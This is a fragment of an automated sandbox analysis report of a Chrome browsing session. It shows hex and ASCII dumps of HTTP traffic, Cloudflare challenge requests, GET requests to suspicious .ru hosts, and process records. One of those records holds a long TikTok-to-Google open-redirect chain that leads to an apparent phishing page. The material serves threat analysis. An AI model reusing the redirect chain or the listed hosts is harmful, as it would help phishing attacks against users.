                                                                  Data Ascii: gAQ2x6Z2atR-AGAs2o+QWGLAPOajjj7UA82n2QJ2aAOjRzAKz8jGgaF+zAAtaIAyjA9agA9APjmpAx+P4ALAa+7HAFjnd6bA3+TAaP2+fU+aJ2zAUhafmgAUjR4KDcxjRAaXLzbAxaDA9M7gacOz2GWAA2rjRIa-Af+7LG9j82bORe-o2nORuAMjALGNA2xPfGA2d2yzGjAv2vOGuAJ29lWqAX2yAA$AMjnBGmAmjnjAbgTfPjaKt9sQMW5AZGA
                                                                  2025-01-13 21:52:39 UTC1757OUTData Raw: 61 33 4a 4c 4b 6a 52 6d 4d 74 2b 56 2b 41 50 61 66 32 6a 6a 52 44 41 75 56 31 6f 49 65 6b 2b 32 54 66 51 72 45 5a 37 72 41 52 45 31 73 7a 6f 64 7a 4e 61 79 32 33 79 55 75 51 32 6d 74 43 4f 36 32 41 70 32 59 48 63 31 7a 55 4d 31 31 77 6b 42 41 37 67 61 59 61 4a 74 4b 72 55 71 71 6b 68 4c 53 68 42 2d 55 4f 51 37 33 41 61 32 67 43 74 41 6f 6d 42 77 6d 56 71 58 61 4f 33 75 32 4e 6f 73 56 70 44 77 61 32 61 67 38 65 41 7a 4e 38 72 54 32 62 61 70 73 5a 52 4d 59 73 57 6d 74 67 69 33 37 6a 41 74 6d 48 32 44 4a 78 6c 6d 58 5a 71 43 4d 6c 31 43 2b 63 5a 56 49 67 45 37 67 37 65 44 74 6d 7a 50 33 45 61 41 6b 4b 47 34 41 56 41 51 7a 63 47 61 75 77 57 68 51 66 41 7a 56 44 49 79 52 70 71 41 2d 54 70 69 50 77 41 6c 72 5a 7a 61 6f 4f 68 49 6c 6b 45 56 6e 4e 66 50 6e 57 61
                                                                  Data Ascii: a3JLKjRmMt+V+APaf2jjRDAuV1oIek+2TfQrEZ7rARE1szodzNay23yUuQ2mtCO62Ap2YHc1zUM11wkBA7gaYaJtKrUqqkhLShB-UOQ73Aa2gCtAomBwmVqXaO3u2NosVpDwa2ag8eAzN8rT2bapsZRMYsWmtgi37jAtmH2DJxlmXZqCMl1C+cZVIgE7g7eDtmzP3EaAkKG4AVAQzcGauwWhQfAzVDIyRpqA-TpiPwAlrZzaoOhIlkEVnNfPnWa
                                                                  2025-01-13 21:52:40 UTC1347INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 4624
                                                                  Connection: close
                                                                  cf-chl-out: v2snttIwdu2Rb1dySTusH/TCrXX7sji9Su1pf8UFRIHeuWXSrG+9RYXkiCSD5MW6qbc52W1VINfDi7cd/lQcGQwUCM7aYONzYcMy3Xa04xM=$KKbXoUpYUiKl/QSPpmsW3A==
                                                                  cf-chl-out-s: xpu+QyfiBZmvQGitP4AGTJRoKoF6IRCSLHl8s6AZQW7oAbeElS9jwp5p9ySCmDmFZyyhYlB9GOxO5NVQekk9jtq5XAGcxqduwX9nXgsyz2u2XYSXHtdC2JycWWiza5uqeRgd+MU65Up3sXBe21MFqkxBZq6BAhDF4kosOWsRdA5ha1MXpsqJGMlKDvLnt1hZA10ZZgtGl+SrCT8GEk1pUv4IjGxdN93Aykc3E41piozbOmonBSi2ijALFh99MVW/94O3wWWyBBj2Pc21t6nBmHjhGsQPfPhLeulOOjEr4qpbrMm/9ynTcqLDKg48jkHotmiSQFnAnKGgebHjNmVyvzJm8Wb6JNyeaB6/QjH4fJfCoQzUaT4RWQKRDIM2MfhG1N49SPAWU5Wn8blgAQrHJi4KRcgPeS+yWCR4Ip11wk4MWvM7sI5Tkb5t1yFohlRLbsI02cznmFWOnapr14XjqEWV7rUbuOodTOfFSZwPJaPcp6k0wud6MIGaw9a8c8BvNyfiTZEwdR16ZP6+Fa46oy9+q03uvEHAIMbVsaLu9j4Ot6HRlBgN9xqnmZUKDSxMCmjg8t3jwfd49UMk2OeGo1e/mX3AaHUJ+M99/nZJG5fkGdU6bfueqj6hmFidD7iH8xXNr49JTqkjR6gqWNXzfPuzWZ1IrMkJIm0wI8YievPr60lMqZH6FmsgGLYs/oPXSOSgndU+dn0ss3SomkQ9v47nKm8e6Y9FKMjQObx6/If0SX7xv2mIxsNmCBLzP7nT3l2Eg3u9Ld0jrJ57bxp/fVSlyIBpYAcoyBVvI4zWJcIS7SxoKatAu/L4kT7KgFzMSZ7mnMFHBIh9A7ClZ+Jq/qKDy8AaMXvESFUX698nEek42Fb0VSOpkg2dWguOSNdTZxNkHLeCW0q62Smu5MYeNA7MeodRB/SBbgpTf+bOAb+078Mp0HnTm/ZDXIgblu/27XIitTZ9dO5APDP0+pc9Lmaa1m4IeflzsVghz83NT8E=$Mnz9F [TRUNCATED]
                                                                  Server: cloudflare
                                                                  2025-01-13 21:52:40 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 39 30 31 38 39 64 35 39 31 63 61 35 35 65 37 64 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                  Data Ascii: CF-RAY: 90189d591ca55e7d-EWRalt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:40 UTC1329INData Raw: 63 30 78 65 64 56 61 57 61 49 39 73 64 58 43 56 61 70 4f 58 6c 35 4e 5a 62 49 56 33 70 6f 69 69 65 70 71 72 6e 4b 6c 70 61 35 78 71 65 37 47 65 61 4c 4f 7a 6a 4c 57 45 69 37 43 38 6e 37 75 59 6e 35 4f 2f 6e 4b 4f 36 77 4a 79 6f 67 34 69 39 6e 49 79 37 72 61 65 2b 76 63 65 53 69 63 48 50 6b 74 6d 33 30 74 50 5a 6c 39 72 53 79 36 37 43 32 73 65 61 78 36 4c 55 72 4b 71 38 33 4d 6a 42 73 50 44 49 77 61 7a 78 36 50 6a 6f 31 64 7a 51 76 74 66 70 39 63 48 76 76 72 33 45 42 75 54 58 42 4d 54 43 31 63 7a 62 2b 68 4c 72 42 67 2f 78 37 65 50 35 35 2f 44 6d 45 39 77 4a 45 67 44 62 46 67 51 44 38 51 62 67 4b 65 41 6e 39 66 6b 6d 2f 67 66 2b 49 52 54 73 4e 54 41 7a 45 79 6b 50 43 54 67 49 4d 51 63 6f 4f 79 6f 39 2b 55 56 43 4a 43 51 36 42 30 41 61 4f 45 4d 33 4c 77 34
                                                                  Data Ascii: c0xedVaWaI9sdXCVapOXl5NZbIV3poiiepqrnKlpa5xqe7GeaLOzjLWEi7C8n7uYn5O/nKO6wJyog4i9nIy7rae+vceSicHPktm30tPZl9rSy67C2seax6LUrKq83MjBsPDIwazx6Pjo1dzQvtfp9cHvvr3EBuTXBMTC1czb+hLrBg/x7eP55/DmE9wJEgDbFgQD8QbgKeAn9fkm/gf+IRTsNTAzEykPCTgIMQcoOyo9+UVCJCQ6B0AaOEM3Lw4
                                                                  2025-01-13 21:52:40 UTC1369INData Raw: 54 64 58 53 48 74 6f 56 6d 39 36 66 58 43 46 66 46 68 6d 59 33 32 45 5a 6b 69 4c 69 49 52 72 68 33 31 6d 68 34 31 30 63 59 4f 4f 6a 6f 69 4a 66 4a 69 49 58 34 46 33 67 6c 75 6c 58 31 71 66 69 58 32 43 6d 36 56 74 6e 4a 32 72 6c 4b 46 2f 71 4b 71 33 6d 62 69 49 73 4a 79 31 6b 36 6d 4c 74 70 43 73 66 72 37 41 68 70 7a 4a 69 59 6d 6e 79 61 79 74 72 4d 2b 6e 30 4d 48 56 76 35 4b 6f 7a 61 37 48 75 72 32 58 32 38 44 68 32 2b 44 59 34 63 2f 47 78 4f 57 6e 32 4b 50 4d 72 66 44 69 7a 72 4c 6e 33 74 54 49 34 4e 6a 31 75 73 62 7a 39 63 77 42 33 67 48 39 7a 76 63 45 78 67 58 42 36 50 34 4e 36 67 33 67 35 39 6f 4a 2f 51 45 50 46 66 6a 75 43 52 50 76 38 68 45 64 47 64 4c 59 46 2b 49 65 39 79 4c 36 43 68 49 71 46 51 73 4d 44 43 63 78 45 43 76 77 4b 43 41 31 44 43 67 56
                                                                  Data Ascii: TdXSHtoVm96fXCFfFhmY32EZkiLiIRrh31mh410cYOOjoiJfJiIX4F3glulX1qfiX2Cm6VtnJ2rlKF/qKq3mbiIsJy1k6mLtpCsfr7AhpzJiYmnyaytrM+n0MHVv5Koza7Hur2X28Dh2+DY4c/GxOWn2KPMrfDizrLn3tTI4Nj1usbz9cwB3gH9zvcExgXB6P4N6g3g59oJ/QEPFfjuCRPv8hEdGdLYF+Ie9yL6ChIqFQsMDCcxECvwKCA1DCgV
                                                                  2025-01-13 21:52:40 UTC1369INData Raw: 70 2f 59 44 78 6c 5a 58 47 41 51 58 4f 4b 65 6c 70 57 56 32 75 47 52 47 70 4b 64 6b 79 56 6c 6d 70 6b 55 5a 32 4b 61 57 70 70 6d 48 39 77 68 47 31 76 6f 35 6c 39 71 57 71 72 61 48 75 64 69 37 42 37 65 36 6d 32 74 72 47 4a 74 6f 69 70 6d 49 61 47 64 61 36 4e 6a 48 6e 43 6d 49 36 32 78 73 69 6e 67 38 48 46 6d 37 2f 4c 69 61 32 78 7a 36 76 4a 6a 36 4c 4d 31 4e 57 36 30 4e 36 62 7a 4e 58 68 33 4a 61 64 33 74 43 65 76 65 47 70 36 38 6e 4b 32 4b 4b 6a 37 2b 76 46 7a 76 48 67 2b 63 62 33 7a 39 62 38 32 75 6a 73 33 66 7a 37 33 64 77 43 78 66 44 6a 42 76 37 5a 36 67 33 68 79 74 34 47 30 41 33 55 38 51 45 46 79 2f 59 57 44 52 41 61 46 2f 37 62 2f 76 44 74 48 68 6e 30 42 78 34 67 49 78 55 65 4c 4f 73 48 45 51 38 74 45 67 34 74 4d 68 4d 6e 4f 52 30 50 4b 78 6f 36 43
                                                                  Data Ascii: p/YDxlZXGAQXOKelpWV2uGRGpKdkyVlmpkUZ2KaWppmH9whG1vo5l9qWqraHudi7B7e6m2trGJtoipmIaGda6NjHnCmI62xsing8HFm7/Lia2xz6vJj6LM1NW60N6bzNXh3Jad3tCeveGp68nK2KKj7+vFzvHg+cb3z9b82ujs3fz73dwCxfDjBv7Z6g3hyt4G0A3U8QEFy/YWDRAaF/7b/vDtHhn0Bx4gIxUeLOsHEQ8tEg4tMhMnOR0PKxo6C
                                                                  2025-01-13 21:52:40 UTC557INData Raw: 41 53 49 42 49 52 59 53 49 68 55 4a 75 69 46 47 41 56 48 4b 50 69 4a 57 50 6b 6d 71 54 6d 58 4f 59 6f 70 70 33 6e 33 32 58 59 35 4e 2b 6f 6d 68 32 5a 4b 4e 75 6d 49 65 71 72 48 43 4f 72 57 35 71 74 72 4f 49 6d 34 75 32 6f 49 75 54 77 62 78 36 6c 4c 69 6f 6b 6f 48 4a 6e 4c 53 6b 78 34 32 35 6f 63 72 4d 6b 4c 48 48 30 63 47 69 7a 61 7a 49 31 4e 6d 77 6f 4c 37 54 6f 72 62 6a 34 4e 71 2b 6f 2b 66 69 75 75 6a 66 30 4d 4c 78 32 75 33 77 38 64 36 32 36 4c 48 34 75 4f 6a 76 32 65 6e 6f 32 76 58 56 2b 2b 48 34 37 2f 67 47 2f 63 72 30 42 67 55 4a 77 67 34 4a 35 4f 30 50 38 66 6a 55 39 42 48 54 39 67 37 36 46 39 7a 34 2f 51 58 68 45 67 51 46 2f 51 67 47 34 2f 6f 64 44 41 33 39 44 43 6b 72 38 42 4d 74 4b 78 6f 56 46 7a 50 38 46 68 76 38 44 68 77 35 45 53 4d 79 50 44
                                                                  Data Ascii: ASIBIRYSIhUJuiFGAVHKPiJWPkmqTmXOYopp3n32XY5N+omh2ZKNumIeqrHCOrW5qtrOIm4u2oIuTwbx6lLiokoHJnLSkx425ocrMkLHH0cGizazI1NmwoL7Torbj4Nq+o+fiuujf0MLx2u3w8d626LH4uOjv2eno2vXV++H47/gG/cr0BgUJwg4J5O0P8fjU9BHT9g76F9z4/QXhEgQF/QgG4/odDA39DCkr8BMtKxoVFzP8Fhv8Dhw5ESMyPD


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.449782104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:40 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:40 UTC375INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:52:40 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cf-chl-out: txpIBm/glMuGr30ElBALpw==$kkiOKkpoMjtImnzrqRIH2Q==
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d5e4faa1875-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:40 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.449783104.21.112.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:40 UTC680OUTGET /aqqmwlrvqzcwktvkpopvdsikJKPNGuiDBESTWYJSWBJUHBXABLMDADRMWZMKQAOEJQRIYUKFBAXNZRU HTTP/1.1
                                                                  Host: votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://rfll.yordickyel.ru
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://rfll.yordickyel.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:41 UTC902INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7H76EcrT4qRfr%2BZNibUVA%2B1hZuI7D2FzcmU1f7p%2BQHq%2FBH6pLKogXATzZdPT9B5RjGxJcNg6NNeGfhCb56B1k%2Bmuewxyx%2F9XVEX8s5EbVZA2r6%2FEZCzNSubxqwbiG%2BUCvEk06zX1GZtk%2B%2BLP%2FqcgN6G3hdyac9ILtma5JZzx3hFotLdGbyPdk8VkyYElZG9sV8hO1aJ1"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d5e8fe2729f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2001&rtt_var=757&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1258&delivery_rate=1439132&cwnd=169&unsent_bytes=0&cid=3dd63bbc2760fde0&ts=558&x=0"
                                                                  2025-01-13 21:52:41 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                  Data Ascii: 11
                                                                  2025-01-13 21:52:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.449786104.21.32.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:41 UTC470OUTGET /aqqmwlrvqzcwktvkpopvdsikJKPNGuiDBESTWYJSWBJUHBXABLMDADRMWZMKQAOEJQRIYUKFBAXNZRU HTTP/1.1
                                                                  Host: votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:42 UTC900INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:42 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cw%2F%2BZYZG546zm5SnwKY%2FywS5wcTCqfqjU%2FsbJ8Le%2B2hFyOpTzIhmHAOfoFPfpzUwpiYdqDX0FNifp3gFg7bnxojeBEF6SzFAlEVDMq%2B6rCtCqexoz4OWYm5AQ7bUp8xjEFt79mVHtyLIBBpP%2B5cYvDvN0F6MOuvUW6braiebZbYvGWX1A%2Be4nPuu1ZNTTN%2BhI40iA%2Fg"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d666b3072b9-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1819&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1048&delivery_rate=1598248&cwnd=217&unsent_bytes=0&cid=cb79bfcb85dd5acb&ts=594&x=0"
                                                                  2025-01-13 21:52:42 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                  Data Ascii: 11
                                                                  2025-01-13 21:52:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:16:52:10
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:16:52:11
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2368,i,15692943179016407377,4443873217804746429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:3
                                                                  Start time:16:52:18
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm"
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  No disassembly